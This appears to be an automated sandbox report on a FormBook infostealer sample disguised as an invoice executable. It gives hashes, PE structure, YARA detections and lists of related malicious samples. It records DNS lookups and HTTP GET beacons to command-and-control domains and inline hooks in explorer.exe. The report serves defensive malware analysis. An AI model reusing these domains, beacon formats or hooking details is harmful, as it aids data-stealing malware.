• Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, g-msn-com-nsatc.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net

                                          Simulations

                                          Behavior and APIs

                                           Time | Type | Description
                                           08:28:25 | API Interceptor | 1x Sleep call for process: PT300975-inv.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                           Match | Associated Sample Name / URL | Detection | Context
                                           198.54.117.244 | test.js | malicious | 101legit.com/0.html
                                            | dsexplrob.exe | malicious | i3mode.com/dbExpressversion/db87987Administrator.php?b=FKfEZOAdYedIVNeAlGKbCgFzoODmhh
                                            | nbmvwchp.js | malicious | 101legit.com/0.html

                                          Domains

                                          No context

                                          ASN

                                           Match | Associated Sample Name / URL | Detection | Context
                                           XIAOZHIYUN1-AS-APICIDCNETWORKUS | anthon.exe | malicious | 156.241.53.168
                                            | RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe | malicious | 156.241.53.195
                                            | Inv.exe | malicious | 156.241.53.9
                                            | Shipping Documents (INV,PL,BL)_pdf.exe | malicious | 156.224.66.93
                                            | Purchase Order 40,7045$.exe | malicious | 45.207.121.138
                                            | Invoice.exe | malicious | 156.241.53.234
                                            | hjKM0s7CWW.exe | malicious | 45.207.121.138
                                            | n4uladudJS.exe | malicious | 45.207.121.138
                                            | T66DUJYHQE.exe | malicious | 45.207.121.138
                                            | #U5341#U4e00#U6708#U4efd#U516c#U53f8#U503c#U73ed#U4eba#U5458#U8c03#U73ed#U901a#U77e5.exe | malicious | 156.253.88.154
                                            | 9qB3tPamJa.exe | malicious | 156.253.114.216
                                            | zYUJ3b5gQF.exe | malicious | 45.207.121.138
                                            | Purchase Order 40,7045$.exe | malicious | 45.207.121.138
                                            | RNM56670112.exe | malicious | 156.225.160.251
                                            | PpCVLJxsOp.exe | malicious | 154.210.136.219
                                            | PO PL.exe | malicious | 156.254.247.54
                                            | 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | malicious | 156.254.221.125
                                            | 3BJGa7Xw4ugPpll.exe | malicious | 23.248.240.227
                                            | y20dxdW3GQ.exe | malicious | 23.235.182.106
                                            | J3ae2JBEng.exe | malicious | 45.207.118.132
                                           NAMECHEAP-NETUS | PR24869408-V2.PDF.exe | malicious | 198.54.122.60
                                            | https://dhumketubd.com/DifferenceCard/login.php | malicious | 198.54.117.200
                                            | vnaSKDMnLG.dll | malicious | 63.250.47.200
                                            | ATT59829.htm | malicious | 198.54.115.249
                                            | PO EME39134.xlsx | malicious | 63.250.38.18
                                            | https://www.ebhadhara.com/ova/office365/YWp1bm5hcmthckBrcm9sbGJvbmRyYXRpbmdzLmNvbQ0%3D | malicious | 199.192.28.206
                                            | FxzOwcXb7x.exe | malicious | 198.54.122.60
                                            | 7OKYiP6gHy.exe | malicious | 198.54.117.217
                                            | ptFIhqUe89.exe | malicious | 63.250.38.18
                                            | Yarranton.co.uk.htm | malicious | 199.188.200.218
                                            | PO#010-240.exe | malicious | 162.213.255.53
                                            | PO_010-240.exe | malicious | 162.213.255.53
                                            | EME.39134.xlsx | malicious | 63.250.38.18
                                            | http://omivjsyyqzyxfria.riantscapital.com/kampo/anNhY2tldHRAYWR2ZW50aXN0aGVhbHRoY2FyZS5jb20= | malicious | 198.54.120.245
                                            | https://1drv.ms/u/s!Ap6-6LFn1rzXgTxzc-81jQs8opJO?e=EhEGR5 | malicious | 198.54.120.226
                                            | n830467925857.xlsm | malicious | 199.192.21.36
                                            | new quotation order.exe | malicious | 198.54.117.216
                                            | NEW ORDER.exe | malicious | 198.54.122.60
                                            | n830467925857.xlsm | malicious | 199.192.21.36
                                            | ATT96626.htm | malicious | 198.54.115.249

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PT300975-inv.exe.log
                                           Process: C:\Users\user\Desktop\PT300975-inv.exe
                                           File Type: ASCII text, with CRLF line terminators
                                           Category: dropped
                                           Size (bytes): 1636
                                           Entropy (8bit): 5.344107669812469
                                           Encrypted: false
                                           SSDEEP: 48:MxHKXeHKlEHU0YHKhQnouHIW7HKjovjHKx1qHLHKs:iqXeqm00YqhQnouRqjorqxwrqs
                                           MD5: BF1A4BABF3E94AA2F0BED4C55E050B13
                                           SHA1: 433EA392F97D828DCA9CC9C080B99D40063CDF50
                                           SHA-256: B74F8FCBDD8A649F2073373BD471F685A14629E7C2DE97C445F60414CBF61B9E
                                           SHA-512: C6D0F73205F524F3DDC9A7211BA07E28A02334AD462DAD893FFF90D5AA9723C09185B6ACF78CEF1C1300CD492FA3AF9C2FCADA18934D73C0CA87B18CC42D0976
                                           Malicious: true
                                           Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                                          Static File Info

                                          General

                                           File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                           Entropy (8bit): 6.285704309931807
                                           TrID:
                                           • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                           • Win32 Executable (generic) a (10002005/4) 49.78%
                                           • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                           • Generic Win/DOS Executable (2004/3) 0.01%
                                           • DOS Executable Generic (2002/1) 0.01%
                                           File name: PT300975-inv.exe
                                           File size: 559616
                                           MD5: 025544a9014cf1667e8a1d4ff68da253
                                           SHA1: 0123853e7960cdae4f3ad95945b4ec86adbb93c6
                                           SHA256: 2858bfcb9388b05049df45459ee60bf96be0b0d75a3be34cf3c00f57ec9f4469
                                           SHA512: a22db404c3a154339b3cd6d4a4227f319f6cb99d103346856ffd6fd249fe08bace4f528f185edc25c0672ae03b2e14c87b31b0b2d0728372c5893821b5a43068
                                           SSDEEP: 6144:3cMR5P4uE1KMtqm/0XWJYoukAlD0o2c3zZOaoRzkZRjdnLor7/7Sr9sTFaOxSxyy:3n5PqttqmMGJYvlxzgaoG3dnG7SeG2+
                                           File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ;.F.................~............... ........@.. ....................................`................................

                                          File Icon

                                           Icon Hash: 00828e8e8686b000

                                          Static PE Info

                                          General

                                           Entrypoint: 0x489c9e
                                           Entrypoint Section: .text
                                           Digitally signed: false
                                           Imagebase: 0x400000
                                           Subsystem: windows gui
                                           Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
                                           DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                           Time Stamp: 0x46D33B20 [Mon Aug 27 20:59:12 2007 UTC]
                                           TLS Callbacks:
                                           CLR (.Net) Version: v4.0.30319
                                           OS Version Major: 4
                                           OS Version Minor: 0
                                           File Version Major: 4
                                           File Version Minor: 0
                                           Subsystem Version Major: 4
                                           Subsystem Version Minor: 0
                                           Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                           add byte ptr [eax], al   (this instruction repeats 97 times; it is the decoding of the zero bytes that pad the section after the jmp stub)

                                          Data Directories

                                           Name | Virtual Address | Virtual Size | Is in Section
                                           IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_IMPORT | 0x89c44 | 0x57 | .text
                                           IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8a000 | 0x622 | .rsrc
                                           IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8c000 | 0xc | .reloc
                                           IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                           IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                          Sections

                                           Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                           .text | 0x2000 | 0x87ca4 | 0x87e00 | False | 0.583592671918 | data | 6.29806430778 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                           .rsrc | 0x8a000 | 0x622 | 0x800 | False | 0.353515625 | data | 3.65274067017 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                           .reloc | 0x8c000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                           Name | RVA | Size | Type | Language | Country
                                           RT_VERSION | 0x8a0a0 | 0x398 | data | |
                                           RT_MANIFEST | 0x8a438 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                          Imports

                                           DLL | Import
                                           mscoree.dll | _CorExeMain

                                          Version Infos

                                           Description | Data
                                           Translation | 0x0000 0x04b0
                                           LegalCopyright | Copyright 2010 F7G5?9JAF>2=>JA7AIB2F
                                           Assembly Version | 1.0.0.0
                                           InternalName | use5.exe
                                           FileVersion | 7.10.14.17
                                           CompanyName | F7G5?9JAF>2=>JA7AIB2F
                                           Comments | :6;C>4;FA4F5DH9D@88B;3
                                           ProductName | 5G5C9985D<<?=>@B5@
                                           ProductVersion | 7.10.14.17
                                           FileDescription | 5G5C9985D<<?=>@B5@
                                           OriginalFilename | use5.exe

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                           Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                           Nov 26, 2020 08:29:26.744565964 CET | 49750 | 80 | 192.168.2.6 | 198.54.117.244
                                           Nov 26, 2020 08:29:26.911395073 CET | 80 | 49750 | 198.54.117.244 | 192.168.2.6
                                           Nov 26, 2020 08:29:26.911807060 CET | 49750 | 80 | 192.168.2.6 | 198.54.117.244
                                           Nov 26, 2020 08:29:26.911973953 CET | 49750 | 80 | 192.168.2.6 | 198.54.117.244
                                           Nov 26, 2020 08:29:27.078738928 CET | 80 | 49750 | 198.54.117.244 | 192.168.2.6
                                           Nov 26, 2020 08:29:27.078759909 CET | 80 | 49750 | 198.54.117.244 | 192.168.2.6
                                           Nov 26, 2020 08:30:08.408441067 CET | 49755 | 80 | 192.168.2.6 | 156.241.53.196
                                           Nov 26, 2020 08:30:08.610635996 CET | 80 | 49755 | 156.241.53.196 | 192.168.2.6
                                           Nov 26, 2020 08:30:08.610830069 CET | 49755 | 80 | 192.168.2.6 | 156.241.53.196
                                           Nov 26, 2020 08:30:08.610979080 CET | 49755 | 80 | 192.168.2.6 | 156.241.53.196
                                           Nov 26, 2020 08:30:08.813050032 CET | 80 | 49755 | 156.241.53.196 | 192.168.2.6
                                           Nov 26, 2020 08:30:09.102338076 CET | 49755 | 80 | 192.168.2.6 | 156.241.53.196
                                           Nov 26, 2020 08:30:09.292335033 CET | 80 | 49755 | 156.241.53.196 | 192.168.2.6
                                           Nov 26, 2020 08:30:09.292357922 CET | 80 | 49755 | 156.241.53.196 | 192.168.2.6
                                           Nov 26, 2020 08:30:09.292530060 CET | 49755 | 80 | 192.168.2.6 | 156.241.53.196
                                           Nov 26, 2020 08:30:09.292561054 CET | 49755 | 80 | 192.168.2.6 | 156.241.53.196
                                           Nov 26, 2020 08:30:09.304438114 CET | 80 | 49755 | 156.241.53.196 | 192.168.2.6
                                           Nov 26, 2020 08:30:09.304570913 CET | 49755 | 80 | 192.168.2.6 | 156.241.53.196

                                          UDP Packets

                                           Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                           Nov 26, 2020 08:28:19.663137913 CET | 56023 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:28:19.690159082 CET | 53 | 56023 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:28:20.626461029 CET | 58384 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:28:20.653572083 CET | 53 | 58384 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:28:21.668230057 CET | 60261 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:28:21.695391893 CET | 53 | 60261 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:28:22.580018997 CET | 56061 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:28:22.607135057 CET | 53 | 56061 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:28:23.502145052 CET | 58336 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:28:23.529290915 CET | 53 | 58336 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:28:25.972165108 CET | 53781 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:28:25.999289989 CET | 53 | 53781 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:28:27.134497881 CET | 54064 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:28:27.161614895 CET | 53 | 54064 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:28:28.241576910 CET | 52811 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:28:28.268699884 CET | 53 | 52811 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:28:29.477148056 CET | 55299 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:28:29.504374981 CET | 53 | 55299 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:28:31.500103951 CET | 63745 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:28:31.527142048 CET | 53 | 63745 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:28:34.086605072 CET | 50055 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:28:34.113698959 CET | 53 | 50055 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:28:37.824050903 CET | 61374 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:28:37.851146936 CET | 53 | 61374 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:28:38.843249083 CET | 50339 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:28:38.870150089 CET | 53 | 50339 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:28:40.249627113 CET | 63307 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:28:40.276679039 CET | 53 | 63307 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:28:49.056457043 CET | 49694 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:28:49.083647013 CET | 53 | 49694 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:29:05.741004944 CET | 54982 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:29:05.768177986 CET | 53 | 54982 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:29:07.180556059 CET | 50010 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:29:07.217647076 CET | 53 | 50010 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:29:11.676465988 CET | 63718 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:29:11.726603985 CET | 53 | 63718 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:29:12.470824003 CET | 62116 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:29:12.506289005 CET | 53 | 62116 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:29:12.947566032 CET | 63816 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:29:12.995899916 CET | 53 | 63816 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:29:13.324655056 CET | 55014 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:29:13.376000881 CET | 53 | 55014 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:29:13.761892080 CET | 62208 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:29:13.797600031 CET | 53 | 62208 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:29:14.079472065 CET | 57574 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:29:14.130125999 CET | 53 | 57574 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:29:14.193630934 CET | 51818 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:29:14.231434107 CET | 53 | 51818 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:29:14.714554071 CET | 56628 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:29:14.751116037 CET | 53 | 56628 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:29:15.363802910 CET | 60778 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:29:15.399085045 CET | 53 | 60778 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:29:16.189421892 CET | 53799 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:29:16.224932909 CET | 53 | 53799 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:29:16.457114935 CET | 54683 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:29:16.500622034 CET | 53 | 54683 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:29:16.675836086 CET | 59329 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:29:16.711163044 CET | 53 | 59329 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:29:21.984956980 CET | 64021 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:29:22.021745920 CET | 53 | 64021 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:29:26.549397945 CET | 56129 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:29:26.737931013 CET | 53 | 56129 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:29:47.298248053 CET | 58177 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:29:47.642015934 CET | 53 | 58177 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:29:48.052105904 CET | 50700 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:29:48.095624924 CET | 53 | 50700 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:29:51.215604067 CET | 54069 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:29:51.255037069 CET | 53 | 54069 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:30:08.060817003 CET | 61178 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:30:08.402991056 CET | 57017 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:30:08.407228947 CET | 53 | 61178 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:30:08.430083990 CET | 53 | 57017 | 8.8.8.8 | 192.168.2.6
                                           Nov 26, 2020 08:30:29.262655973 CET | 56327 | 53 | 192.168.2.6 | 8.8.8.8
                                           Nov 26, 2020 08:30:29.332756996 CET | 53 | 56327 | 8.8.8.8 | 192.168.2.6

                                          DNS Queries

                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                          Nov 26, 2020 08:29:16.457114935 CET | 192.168.2.6 | 8.8.8.8 | 0xe265 | Standard query (0) | g.msn.com | A (IP address) | IN (0x0001)
                                          Nov 26, 2020 08:29:26.549397945 CET | 192.168.2.6 | 8.8.8.8 | 0x9f9c | Standard query (0) | www.solidconstruct.site | A (IP address) | IN (0x0001)
                                          Nov 26, 2020 08:29:47.298248053 CET | 192.168.2.6 | 8.8.8.8 | 0xcf3f | Standard query (0) | www.hongreng.xyz | A (IP address) | IN (0x0001)
                                          Nov 26, 2020 08:30:08.060817003 CET | 192.168.2.6 | 8.8.8.8 | 0x869a | Standard query (0) | www.asacal.com | A (IP address) | IN (0x0001)
                                          Nov 26, 2020 08:30:29.262655973 CET | 192.168.2.6 | 8.8.8.8 | 0x7da1 | Standard query (0) | www.kornteengoods.com | A (IP address) | IN (0x0001)

                                          DNS Answers

                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                          Nov 26, 2020 08:29:16.500622034 CET | 8.8.8.8 | 192.168.2.6 | 0xe265 | No error (0) | g.msn.com | g-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)
                                          Nov 26, 2020 08:29:26.737931013 CET | 8.8.8.8 | 192.168.2.6 | 0x9f9c | No error (0) | www.solidconstruct.site | | 198.54.117.244 | A (IP address) | IN (0x0001)
                                          Nov 26, 2020 08:29:47.642015934 CET | 8.8.8.8 | 192.168.2.6 | 0xcf3f | Name error (3) | www.hongreng.xyz | none | none | A (IP address) | IN (0x0001)
                                          Nov 26, 2020 08:30:08.407228947 CET | 8.8.8.8 | 192.168.2.6 | 0x869a | No error (0) | www.asacal.com | | 156.241.53.196 | A (IP address) | IN (0x0001)
                                          Nov 26, 2020 08:30:29.332756996 CET | 8.8.8.8 | 192.168.2.6 | 0x7da1 | Name error (3) | www.kornteengoods.com | none | none | A (IP address) | IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.solidconstruct.site
                                          • www.asacal.com

                                          HTTP Packets

                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          0 | 192.168.2.6 | 49750 | 198.54.117.244 | 80 | C:\Windows\explorer.exe

                                          Timestamp | kBytes transferred | Direction | Data
                                          Nov 26, 2020 08:29:26.911973953 CET | 5347 | OUT | GET /jqc/?JfEtEZgp=AQxPeURRQ9kC4DgOk8VME5njQ8dFSmWtzYEqQ7tz67PuOtzOYn8gv4wq3HEWg5IvV5fpD9rFbA==&ojq0s=RzulsD HTTP/1.1
                                          Host: www.solidconstruct.site
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          1 | 192.168.2.6 | 49755 | 156.241.53.196 | 80 | C:\Windows\explorer.exe

                                          Timestamp | kBytes transferred | Direction | Data
                                          Nov 26, 2020 08:30:08.610979080 CET | 6108 | OUT | GET /jqc/?JfEtEZgp=cE9UUOc3pLPT0LAdHSIP3evlMF3IBhbdmq5wG0CQLEBsctkiCkQzhS7S4EgmhhRecsIvRlsotA==&ojq0s=RzulsD HTTP/1.1
                                          Host: www.asacal.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:

                                          Nov 26, 2020 08:30:09.292335033 CET | 6118 | IN | HTTP/1.1 302 Moved Temporarily
                                          Date: Thu, 26 Nov 2020 07:30:08 GMT
                                          Server: Apache
                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                          Pragma: no-cache
                                          Set-Cookie: PHPSESSID=u9i0r05tpvbtv5qber0ofb8qs2; path=/
                                          Set-Cookie: PHPSESSID=ft1su6f9qnak6jout2tis60pq6; path=/
                                          Upgrade: h2
                                          Connection: Upgrade, close
                                          Location: /
                                          Content-Length: 0
                                          Content-Type: text/html; charset=gbk


                                          Code Manipulations

                                          User Modules

                                          Hook Summary

                                          Function Name | Hook Type | Active in Processes
                                          PeekMessageA | INLINE | explorer.exe
                                          PeekMessageW | INLINE | explorer.exe
                                          GetMessageW | INLINE | explorer.exe
                                          GetMessageA | INLINE | explorer.exe

                                          Processes

                                          Process: explorer.exe, Module: user32.dll
                                          Function Name | Hook Type | New Data
                                          PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xEE
                                          PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xEE
                                          GetMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xEE
                                          GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xEE

                                          Statistics

                                          Behavior


                                          System Behavior

                                          General

                                          Start time: 08:28:24
                                          Start date: 26/11/2020
                                          Path: C:\Users\user\Desktop\PT300975-inv.exe
                                          Wow64 process (32bit): true
                                          Commandline: 'C:\Users\user\Desktop\PT300975-inv.exe'
                                          Imagebase: 0xc50000
                                          File size: 559616 bytes
                                          MD5 hash: 025544A9014CF1667E8A1D4FF68DA253
                                          Has elevated privileges: true
                                          Has administrator privileges: true
                                          Programmed in: .Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation: low

                                          General

                                          Start time: 08:28:25
                                          Start date: 26/11/2020
                                          Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                                          Wow64 process (32bit): true
                                          Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                                          Imagebase: 0xc20000
                                          File size: 107592 bytes
                                          MD5 hash: 38368FC9F84C7A27D0C8CD8E1543F172
                                          Has elevated privileges: true
                                          Has administrator privileges: true
                                          Programmed in: C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
